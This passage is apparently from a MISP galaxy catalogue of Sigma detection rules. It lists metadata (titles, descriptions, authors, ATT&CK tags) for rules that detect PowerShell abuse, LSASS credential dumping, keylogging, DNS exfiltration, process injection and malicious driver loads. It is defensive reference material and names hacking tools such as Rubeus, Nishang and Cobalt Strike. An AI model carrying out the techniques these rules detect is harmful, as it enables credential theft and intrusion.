filename posh_ps_susp_zip_compress.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.collection', 'attack.t1074.001']
Related clusters

To see the related clusters, click here.

Potential Keylogger Activity

Detects PowerShell scripts that contains reference to keystroke capturing functions

Internal MISP references

UUID 965e2db9-eddb-4cf6-a986-7a967df651e4 which can be used as unique global reference for Potential Keylogger Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/04
falsepositive ['Unknown']
filename posh_ps_susp_keylogger_activity.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.collection', 'attack.credential_access', 'attack.t1056.001']
Related clusters

To see the related clusters, click here.

Suspicious Process Discovery With Get-Process

Get the processes that are running on the local computer.

Internal MISP references

UUID af4c87ce-bdda-4215-b998-15220772e993 which can be used as unique global reference for Suspicious Process Discovery With Get-Process in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/17
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_susp_get_process.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1057']
Related clusters

To see the related clusters, click here.

Clear PowerShell History - PowerShell

Detects keywords that could indicate clearing PowerShell history

Internal MISP references

UUID 26b692dc-1722-49b2-b496-a8258aa6371d which can be used as unique global reference for Clear PowerShell History - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
creation_date 2022/01/25
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_clear_powershell_history.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.003']
Related clusters

To see the related clusters, click here.

Active Directory Group Enumeration With Get-AdGroup

Detects usage of the "Get-AdGroup" cmdlet to enumerate Groups within Active Directory

Internal MISP references

UUID 8c3a6607-b7dc-4f0d-a646-ef38c00b76ee which can be used as unique global reference for Active Directory Group Enumeration With Get-AdGroup in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/17
falsepositive ['Unknown']
filename posh_ps_get_adgroup.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1069.002']
Related clusters

To see the related clusters, click here.

Potential COM Objects Download Cradles Usage - PS Script

Detects usage of COM objects that can be abused to download files in PowerShell by CLSID

Internal MISP references

UUID 3c7d1587-3b13-439f-9941-7d14313dbdfe which can be used as unique global reference for Potential COM Objects Download Cradles Usage - PS Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/25
falsepositive ['Legitimate use of the library']
filename posh_ps_download_com_cradles.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Malicious PowerShell Commandlets - ScriptBlock

Detects Commandlet names from well-known PowerShell exploitation frameworks

Internal MISP references

UUID 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 which can be used as unique global reference for Malicious PowerShell Commandlets - ScriptBlock in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer
creation_date 2017/03/05
falsepositive ['Unknown']
filename posh_ps_malicious_commandlets.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.discovery', 'attack.t1482', 'attack.t1087', 'attack.t1087.001', 'attack.t1087.002', 'attack.t1069.001', 'attack.t1069.002', 'attack.t1069', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell

Detects Obfuscated Powershell via VAR++ LAUNCHER

Internal MISP references

UUID e54f5149-6ba3-49cf-b153-070d24679126 which can be used as unique global reference for Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, oscd.community
creation_date 2020/10/13
falsepositive ['Unknown']
filename posh_ps_invoke_obfuscation_via_var.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Clearing Windows Console History

Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.

Internal MISP references

UUID bde47d4b-9987-405c-94c7-b080410e8ea7 which can be used as unique global reference for Clearing Windows Console History in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger
creation_date 2021/11/25
falsepositive ['Unknown']
filename posh_ps_clearing_windows_console_history.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070', 'attack.t1070.003']
Related clusters

To see the related clusters, click here.

HackTool - Rubeus Execution - ScriptBlock

Detects the execution of the hacktool Rubeus using specific command line flags

Internal MISP references

UUID 3245cd30-e015-40ff-a31d-5cadd5f377ec which can be used as unique global reference for HackTool - Rubeus Execution - ScriptBlock in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)
creation_date 2023/04/27
falsepositive ['Unlikely']
filename posh_ps_hktl_rubeus.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.t1003', 'attack.t1558.003', 'attack.lateral_movement', 'attack.t1550.003']
Related clusters

To see the related clusters, click here.

Powershell XML Execute Command

Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code

Internal MISP references

UUID 6c6c6282-7671-4fe9-a0ce-a2dcebdc342b which can be used as unique global reference for Powershell XML Execute Command in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/19
falsepositive ['Legitimate administrative script']
filename posh_ps_xml_iex.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious PowerShell Invocations - Specific

Detects suspicious PowerShell invocation command parameters

Internal MISP references

UUID ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71 which can be used as unique global reference for Suspicious PowerShell Invocations - Specific in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jonhnathan Ribeiro
creation_date 2017/03/05
falsepositive ['Unknown']
filename posh_ps_susp_invocation_specific.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Windows Defender Exclusions Added - PowerShell

Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions

Internal MISP references

UUID c1344fa2-323b-4d2e-9176-84b4d4821c88 which can be used as unique global reference for Windows Defender Exclusions Added - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Elastic (idea)
creation_date 2022/09/16
falsepositive ['Unknown']
filename posh_ps_win_defender_exclusions_added.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562', 'attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Suspicious X509Enrollment - Ps Script

Detect use of X509Enrollment

Internal MISP references

UUID 504d63cb-0dba-4d02-8531-e72981aace2c which can be used as unique global reference for Suspicious X509Enrollment - Ps Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/12/23
falsepositive ['Legitimate administrative script']
filename posh_ps_x509enrollment.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1553.004']
Related clusters

To see the related clusters, click here.

Malicious Nishang PowerShell Commandlets

Detects Commandlet names and arguments from the Nishang exploitation framework

Internal MISP references

UUID f772cee9-b7c2-4cb2-8f07-49870adc02e0 which can be used as unique global reference for Malicious Nishang PowerShell Commandlets in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Alec Costello
creation_date 2019/05/16
falsepositive ['Unknown']
filename posh_ps_nishang_malicious_commandlets.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious GetTypeFromCLSID ShellExecute

Detects suspicious Powershell code that execute COM Objects

Internal MISP references

UUID 8bc063d5-3a3a-4f01-a140-bc15e55e8437 which can be used as unique global reference for Suspicious GetTypeFromCLSID ShellExecute in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/02
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_susp_gettypefromclsid.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.privilege_escalation', 'attack.persistence', 'attack.t1546.015']
Related clusters

To see the related clusters, click here.

WMImplant Hack Tool

Detects parameters used by WMImplant

Internal MISP references

UUID 8028c2c3-e25a-46e3-827f-bbb5abf181d7 which can be used as unique global reference for WMImplant Hack Tool in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author NVISO
creation_date 2020/03/26
falsepositive ['Administrative scripts that use the same keywords.']
filename posh_ps_wmimplant.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.execution', 'attack.t1047', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Registry-Free Process Scope COR_PROFILER

Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR. (Citation: Microsoft Profiling Mar 2017) (Citation: Microsoft COR_PROFILER Feb 2013)

Internal MISP references

UUID 23590215-4702-4a70-8805-8dc9e58314a2 which can be used as unique global reference for Registry-Free Process Scope COR_PROFILER in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/30
falsepositive ['Legitimate administrative script']
filename posh_ps_cor_profiler.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.persistence', 'attack.t1574.012']
Related clusters

To see the related clusters, click here.

Powershell DNSExfiltration

DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel

Internal MISP references

UUID d59d7842-9a21-4bc6-ba98-64bfe0091355 which can be used as unique global reference for Powershell DNSExfiltration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/07
falsepositive ['Legitimate script']
filename posh_ps_invoke_dnsexfiltration.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.exfiltration', 'attack.t1048']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Use MSHTA - PowerShell

Detects Obfuscated Powershell via use MSHTA in Scripts

Internal MISP references

UUID e55a5195-4724-480e-a77e-3ebe64bd3759 which can be used as unique global reference for Invoke-Obfuscation Via Use MSHTA - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/08
falsepositive ['Unknown']
filename posh_ps_invoke_obfuscation_via_use_mhsta.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Potential Persistence Via Security Descriptors - ScriptBlock

Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.

Internal MISP references

UUID 2f77047c-e6e9-4c11-b088-a3de399524cd which can be used as unique global reference for Potential Persistence Via Security Descriptors - ScriptBlock in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/05
falsepositive ['Unknown']
filename posh_ps_susp_ace_tampering.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation']

Powershell WMI Persistence

Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.

Internal MISP references

UUID 9e07f6e7-83aa-45c6-998e-0af26efd0a85 which can be used as unique global reference for Powershell WMI Persistence in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/08/19
falsepositive ['Unknown']
filename posh_ps_wmi_persistence.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1546.003']
Related clusters

To see the related clusters, click here.

Code Executed Via Office Add-in XLL File

Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs

Internal MISP references

UUID 36fbec91-fa1b-4d5d-8df1-8d8edcb632ad which can be used as unique global reference for Code Executed Via Office Add-in XLL File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/28
falsepositive ['Unknown']
filename posh_ps_office_comobject_registerxll.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.persistence', 'attack.t1137.006']
Related clusters

To see the related clusters, click here.

Powershell Directory Enumeration

Detects technique used by MAZE ransomware to enumerate directories using Powershell

Internal MISP references

UUID 162e69a7-7981-4344-84a9-0f1c9a217a52 which can be used as unique global reference for Powershell Directory Enumeration in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/17
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_susp_directory_enum.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1083']
Related clusters

To see the related clusters, click here.

Automated Collection Bookmarks Using Get-ChildItem PowerShell

Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.

Internal MISP references

UUID e0565f5d-d420-4e02-8a68-ac00d864f9cf which can be used as unique global reference for Automated Collection Bookmarks Using Get-ChildItem PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/13
falsepositive ['Unknown']
filename posh_ps_get_childitem_bookmarks.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.discovery', 'attack.t1217']
Related clusters

To see the related clusters, click here.

Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script

Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil

Internal MISP references

UUID c1337eb8-921a-4b59-855b-4ba188ddcc42 which can be used as unique global reference for Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch
creation_date 2022/09/20
falsepositive ['Unknown']
filename posh_ps_susp_win32_shadowcopy_deletion.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.impact', 'attack.t1490']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation CLIP+ Launcher - PowerShell

Detects Obfuscated use of Clip.exe to execute PowerShell

Internal MISP references

UUID 73e67340-0d25-11eb-adc1-0242ac120002 which can be used as unique global reference for Invoke-Obfuscation CLIP+ Launcher - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/13
falsepositive ['Unknown']
filename posh_ps_invoke_obfuscation_clip.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

PowerShell Get-Process LSASS in ScriptBlock

Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity

Internal MISP references

UUID 84c174ab-d3ef-481f-9c86-a50d0b8e3edb which can be used as unique global reference for PowerShell Get-Process LSASS in ScriptBlock in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/04/23
falsepositive ['Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)']
filename posh_ps_susp_getprocess_lsass.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Suspicious IO.FileStream

Open a handle on the drive volume via the \.\ DOS device path specifier and perform direct access read of the first few bytes of the volume.

Internal MISP references

UUID 70ad982f-67c8-40e0-a955-b920c2fa05cb which can be used as unique global reference for Suspicious IO.FileStream in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/09
falsepositive ['Legitimate PowerShell scripts']
filename posh_ps_susp_iofilestream.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070.003']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation Via Stdin - Powershell

Detects Obfuscated Powershell via Stdin in Scripts

Internal MISP references

UUID 86b896ba-ffa1-4fea-83e3-ee28a4c915c7 which can be used as unique global reference for Invoke-Obfuscation Via Stdin - Powershell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nikita Nazarov, oscd.community
creation_date 2020/10/12
falsepositive ['Unknown']
filename posh_ps_invoke_obfuscation_via_stdin.yml
level high
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript

Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script

Internal MISP references

UUID e2812b49-bae0-4b21-b366-7c142eafcde2 which can be used as unique global reference for Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/07/13
falsepositive ['Legitimate administration and backup scripts']
filename posh_ps_win32_nteventlogfile_usage.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion']

PowerShell Script With File Upload Capabilities

Detects PowerShell scripts leveraging the "Invoke-WebRequest" cmdlet to send data via either "PUT" or "POST" method.

Internal MISP references

UUID d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb which can be used as unique global reference for PowerShell Script With File Upload Capabilities in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/01/07
falsepositive ['Unknown']
filename posh_ps_script_with_upload_capabilities.yml
level low
logsource.category ps_script
logsource.product windows
tags ['attack.exfiltration', 'attack.t1020']
Related clusters

To see the related clusters, click here.

Root Certificate Installed - PowerShell

Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.

Internal MISP references

UUID 42821614-9264-4761-acfc-5772c3286f76 which can be used as unique global reference for Root Certificate Installed - PowerShell in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, @redcanary, Zach Stanford @svch0st
creation_date 2020/10/10
falsepositive ["Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP"]
filename posh_ps_root_certificate_installed.yml
level medium
logsource.category ps_script
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1553.004']
Related clusters

To see the related clusters, click here.

Potential Defense Evasion Via Raw Disk Access By Uncommon Tools

Detects raw disk access using uncommon tools or tools that are located in suspicious locations (heavy filtering is required), which could indicate possible defense evasion attempts

Internal MISP references

UUID db809f10-56ce-4420-8c86-d6a7d793c79c which can be used as unique global reference for Potential Defense Evasion Via Raw Disk Access By Uncommon Tools in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, oscd.community
creation_date 2019/10/22
falsepositive ['Likely']
filename raw_access_thread_susp_disk_access_using_uncommon_tools.yml
level low
logsource.category raw_access_thread
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1006']
Related clusters

To see the related clusters, click here.

Password Dumper Remote Thread in LSASS

Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage. The process in field Process is the malicious program. A single execution can lead to hundreds of events.

Internal MISP references

UUID f239b326-2f41-4d6b-9dfa-c846a60ef505 which can be used as unique global reference for Password Dumper Remote Thread in LSASS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke
creation_date 2017/02/19
falsepositive ['Antivirus products']
filename create_remote_thread_win_susp_password_dumper_lsass.yml
level high
logsource.category create_remote_thread
logsource.product windows
tags ['attack.credential_access', 'attack.s0005', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Rare Remote Thread Creation By Uncommon Source Image

Detects uncommon processes creating remote threads.

Internal MISP references

UUID 02d1d718-dd13-41af-989d-ea85c7fab93f which can be used as unique global reference for Rare Remote Thread Creation By Uncommon Source Image in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Perez Diego (@darkquassar), oscd.community
creation_date 2019/10/27
falsepositive ['This rule is best put in testing first in order to create a baseline that reflects the data in your environment.']
filename create_remote_thread_win_susp_relevant_source_image.yml
level high
logsource.category create_remote_thread
logsource.product windows
tags ['attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1055']
Related clusters

To see the related clusters, click here.

Remote Thread Creation In Mstsc.Exe From Suspicious Location

Detects remote thread creation in the "mstsc.exe" process by a process located in a potentially suspicious location. This technique is often used by attackers in order to hook some APIs used by DLLs loaded by "mstsc.exe" during RDP authentications in order to steal credentials.

Internal MISP references

UUID c0aac16a-b1e7-4330-bab0-3c27bb4987c7 which can be used as unique global reference for Remote Thread Creation In Mstsc.Exe From Suspicious Location in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/07/28
falsepositive ['Unknown']
filename create_remote_thread_win_mstsc_susp_location.yml
level high
logsource.category create_remote_thread
logsource.product windows
tags ['attack.credential_access']

Remote Thread Creation By Uncommon Source Image

Detects uncommon processes creating remote threads.

Internal MISP references

UUID 66d31e5f-52d6-40a4-9615-002d3789a119 which can be used as unique global reference for Remote Thread Creation By Uncommon Source Image in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Perez Diego (@darkquassar), oscd.community
creation_date 2019/10/27
falsepositive ['This rule is best put in testing first in order to create a baseline that reflects the data in your environment.']
filename create_remote_thread_win_susp_uncommon_source_image.yml
level medium
logsource.category create_remote_thread
logsource.product windows
tags ['attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1055']
Related clusters

To see the related clusters, click here.

Remote Thread Creation Via PowerShell In Uncommon Target

Detects the creation of a remote thread from a Powershell process in an uncommon target process

Internal MISP references

UUID 99b97608-3e21-4bfe-8217-2a127c396a0e which can be used as unique global reference for Remote Thread Creation Via PowerShell In Uncommon Target in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/06/25
falsepositive ['Unknown']
filename create_remote_thread_win_powershell_susp_targets.yml
level medium
logsource.category create_remote_thread
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1218.011', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Remote Thread Created In KeePass.EXE

Detects remote thread creation in "KeePass.exe" which could indicates potential password dumping activity

Internal MISP references

UUID 77564cc2-7382-438b-a7f6-395c2ae53b9a which can be used as unique global reference for Remote Thread Created In KeePass.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timon Hackenjos
creation_date 2022/04/22
falsepositive ['Unknown']
filename create_remote_thread_win_keepass.yml
level high
logsource.category create_remote_thread
logsource.product windows
tags ['attack.credential_access', 'attack.t1555.005']
Related clusters

To see the related clusters, click here.

HackTool - Potential CobaltStrike Process Injection

Detects a potential remote threat creation with certain characteristics which are typical for Cobalt Strike beacons

Internal MISP references

UUID 6309645e-122d-4c5b-bb2b-22e4f9c2fa42 which can be used as unique global reference for HackTool - Potential CobaltStrike Process Injection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Olaf Hartong, Florian Roth (Nextron Systems), Aleksey Potapov, oscd.community
creation_date 2018/11/30
falsepositive ['Unknown']
filename create_remote_thread_win_hktl_cobaltstrike.yml
level high
logsource.category create_remote_thread
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1055.001']
Related clusters

To see the related clusters, click here.

Remote Thread Creation Ttdinject.exe Proxy

Detects a remote thread creation of Ttdinject.exe used as proxy

Internal MISP references

UUID c15e99a3-c474-48ab-b9a7-84549a7a9d16 which can be used as unique global reference for Remote Thread Creation Ttdinject.exe Proxy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/05/16
falsepositive ['Unknown']
filename create_remote_thread_win_ttdinjec.yml
level high
logsource.category create_remote_thread
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1127']
Related clusters

To see the related clusters, click here.

Remote Thread Creation In Uncommon Target Image

Detects uncommon target processes for remote thread creation

Internal MISP references

UUID a1a144b7-5c9b-4853-a559-2172be8d4a03 which can be used as unique global reference for Remote Thread Creation In Uncommon Target Image in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/16
falsepositive ['Unknown']
filename create_remote_thread_win_susp_uncommon_target_image.yml
level medium
logsource.category create_remote_thread
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1055.003']
Related clusters

To see the related clusters, click here.

Potential Credential Dumping Attempt Via PowerShell Remote Thread

Detects remote thread creation by PowerShell processes into "lsass.exe"

Internal MISP references

UUID fb656378-f909-47c1-8747-278bf09f4f4f which can be used as unique global reference for Potential Credential Dumping Attempt Via PowerShell Remote Thread in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author oscd.community, Natalia Shornikova
creation_date 2020/10/06
falsepositive ['Unknown']
filename create_remote_thread_win_powershell_lsass.yml
level high
logsource.category create_remote_thread
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

HackTool - CACTUSTORCH Remote Thread Creation

Detects remote thread creation from CACTUSTORCH as described in references.

Internal MISP references

UUID 2e4e488a-6164-4811-9ea1-f960c7359c40 which can be used as unique global reference for HackTool - CACTUSTORCH Remote Thread Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @SBousseaden (detection), Thomas Patzke (rule)
creation_date 2019/02/01
falsepositive ['Unknown']
filename create_remote_thread_win_hktl_cactustorch.yml
level high
logsource.category create_remote_thread
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1055.012', 'attack.t1059.005', 'attack.t1059.007', 'attack.t1218.005']
Related clusters

To see the related clusters, click here.

PUA - Process Hacker Driver Load

Detects driver load of the Process Hacker tool

Internal MISP references

UUID 67add051-9ee7-4ad3-93ba-42935615ae8d which can be used as unique global reference for PUA - Process Hacker Driver Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/11/16
falsepositive ['Legitimate use of process hacker or system informer by developers or system administrators']
filename driver_load_win_pua_process_hacker.yml
level high
logsource.category driver_load
logsource.product windows
tags ['attack.privilege_escalation', 'cve.2021.21551', 'attack.t1543']
Related clusters

To see the related clusters, click here.

Malicious Driver Load By Name

Detects loading of known malicious drivers via the file name of the drivers.

Internal MISP references

UUID 39b64854-5497-4b57-a448-40977b8c9679 which can be used as unique global reference for Malicious Driver Load By Name in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/03
falsepositive ["False positives may occur if one of the vulnerable driver names mentioned above didn't change its name between versions. So always make sure that the driver being loaded is the legitimate one and the non vulnerable version.", 'If you experience a lot of FP you could comment the driver name or its exact known legitimate location (when possible)']
filename driver_load_win_mal_drivers_names.yml
level medium
logsource.category driver_load
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1543.003', 'attack.t1068']
Related clusters

To see the related clusters, click here.

Driver Load From A Temporary Directory

Detects a driver load from a temporary directory

Internal MISP references

UUID 2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75 which can be used as unique global reference for Driver Load From A Temporary Directory in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2017/02/12
falsepositive ['There is a relevant set of false positives depending on applications in the environment']
filename driver_load_win_susp_temp_use.yml
level high
logsource.category driver_load
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Vulnerable HackSys Extreme Vulnerable Driver Load

Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors

Internal MISP references

UUID 295c9289-acee-4503-a571-8eacaef36b28 which can be used as unique global reference for Vulnerable HackSys Extreme Vulnerable Driver Load in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/18
falsepositive ['Unlikely']
filename driver_load_win_vuln_hevd_driver.yml
level high
logsource.category driver_load
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

